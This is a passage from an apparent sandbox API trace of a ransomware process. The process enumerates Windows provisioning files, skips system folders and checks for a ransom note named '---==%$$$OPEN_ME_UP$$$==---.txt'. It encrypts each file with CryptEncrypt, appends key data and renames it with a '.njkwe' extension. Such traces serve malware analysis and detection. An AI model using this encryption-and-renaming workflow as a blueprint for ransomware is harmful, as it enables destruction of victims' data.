lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\17__connections_cellular_optus (australia)_i8$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.150] GetProcessHeap () returned 0xbe0000 [0077.150] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.150] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906c07a8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906c07a8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906c07a8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml", cAlternateFileName="180__C~1.PRO")) returned 1 [0077.150] lstrcmpiW (lpString1="180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.150] lstrcmpiW (lpString1="180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.150] lstrcmpiW (lpString1="180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.150] lstrcmpiW (lpString1="180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.150] lstrcmpiW (lpString1="180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.150] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml") returned 161 [0077.150] StrStrIW (lpFirst="180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.150] lstrcmpW (lpString1="180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.150] lstrcmpW (lpString1="180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.150] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\180__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.150] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\180__connections_cellular_3 (hong kong sar)_i5$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.151] GetTickCount () returned 0x11539f8 [0077.151] GetTickCount () returned 0x11539f8 [0077.151] GetTickCount () returned 0x11539f8 [0077.151] GetTickCount () returned 0x11539f8 [0077.151] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.151] GetProcessHeap () returned 0xbe0000 [0077.151] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.151] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0077.152] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.152] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0077.152] GetProcessHeap () returned 0xbe0000 [0077.152] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.152] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.152] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.153] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.153] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.153] CloseHandle (hObject=0x43c) returned 1 [0077.153] GetProcessHeap () returned 0xbe0000 [0077.153] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.153] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\180__connections_cellular_3 (hong kong sar)_i5$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\180__Connections_Cellular_3 (Hong Kong SAR)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\180__connections_cellular_3 (hong kong sar)_i5$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.154] GetProcessHeap () returned 0xbe0000 [0077.154] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.154] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906e6a13, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906e6a13, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906e6a13, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="181__C~1.PRO")) returned 1 [0077.154] lstrcmpiW (lpString1="181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.154] lstrcmpiW (lpString1="181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.154] lstrcmpiW (lpString1="181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.154] lstrcmpiW (lpString1="181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.154] lstrcmpiW (lpString1="181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.154] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml") returned 164 [0077.154] StrStrIW (lpFirst="181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.154] lstrcmpW (lpString1="181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.154] lstrcmpW (lpString1="181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.154] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\181__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.154] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\181__connections_cellular_cmhk (hong kong sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.155] GetTickCount () returned 0x1153a08 [0077.155] GetTickCount () returned 0x1153a08 [0077.155] GetTickCount () returned 0x1153a08 [0077.155] GetTickCount () returned 0x1153a08 [0077.155] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.155] GetProcessHeap () returned 0xbe0000 [0077.155] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.155] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0077.157] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.157] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0077.157] GetProcessHeap () returned 0xbe0000 [0077.157] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.157] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.157] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.157] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.157] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.157] CloseHandle (hObject=0x43c) returned 1 [0077.157] GetProcessHeap () returned 0xbe0000 [0077.157] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.157] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0077.157] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\181__connections_cellular_cmhk (hong kong sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\181__Connections_Cellular_CMHK (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\181__connections_cellular_cmhk (hong kong sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.158] GetProcessHeap () returned 0xbe0000 [0077.158] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.158] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906e6a13, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906e6a13, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906e6a13, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="182__C~1.PRO")) returned 1 [0077.158] lstrcmpiW (lpString1="182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.158] lstrcmpiW (lpString1="182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.158] lstrcmpiW (lpString1="182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.158] lstrcmpiW (lpString1="182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.158] lstrcmpiW (lpString1="182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.158] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml") returned 164 [0077.158] StrStrIW (lpFirst="182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.158] lstrcmpW (lpString1="182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.158] lstrcmpW (lpString1="182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.158] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\182__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.158] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\182__connections_cellular_pccw (hong kong sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.158] GetTickCount () returned 0x1153a08 [0077.159] GetTickCount () returned 0x1153a08 [0077.159] GetTickCount () returned 0x1153a08 [0077.159] GetTickCount () returned 0x1153a08 [0077.159] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.159] GetProcessHeap () returned 0xbe0000 [0077.159] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.159] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0077.162] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.162] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0077.162] GetProcessHeap () returned 0xbe0000 [0077.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.162] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.163] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.163] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.163] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.163] CloseHandle (hObject=0x43c) returned 1 [0077.163] GetProcessHeap () returned 0xbe0000 [0077.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.163] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0077.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\182__connections_cellular_pccw (hong kong sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\182__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\182__connections_cellular_pccw (hong kong sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.163] GetProcessHeap () returned 0xbe0000 [0077.164] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.164] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906e6a13, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906e6a13, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906e6a13, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x282, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="183__C~1.PRO")) returned 1 [0077.164] lstrcmpiW (lpString1="183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.164] lstrcmpiW (lpString1="183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.164] lstrcmpiW (lpString1="183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.164] lstrcmpiW (lpString1="183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.164] lstrcmpiW (lpString1="183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.164] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml") returned 164 [0077.164] StrStrIW (lpFirst="183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.164] lstrcmpW (lpString1="183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.164] lstrcmpW (lpString1="183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.164] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\183__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.164] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\183__Connections_Cellular_PCCW (Hong Kong SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\183__connections_cellular_pccw (hong kong sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.164] GetTickCount () returned 0x1153a08 [0077.164] GetTickCount () returned 0x1153a08 [0077.164] GetTickCount () returned 0x1153a08 [0077.164] GetTickCount () returned 0x1153a08 [0077.164] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.164] GetProcessHeap () returned 0xbe0000 [0077.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.164] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x282, lpOverlapped=0x0) returned 1 [0077.168] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.168] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x282, lpOverlapped=0x0) returned 1 [0077.168] GetProcessHeap () returned 0xbe0000 [0077.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.168] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.168] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, 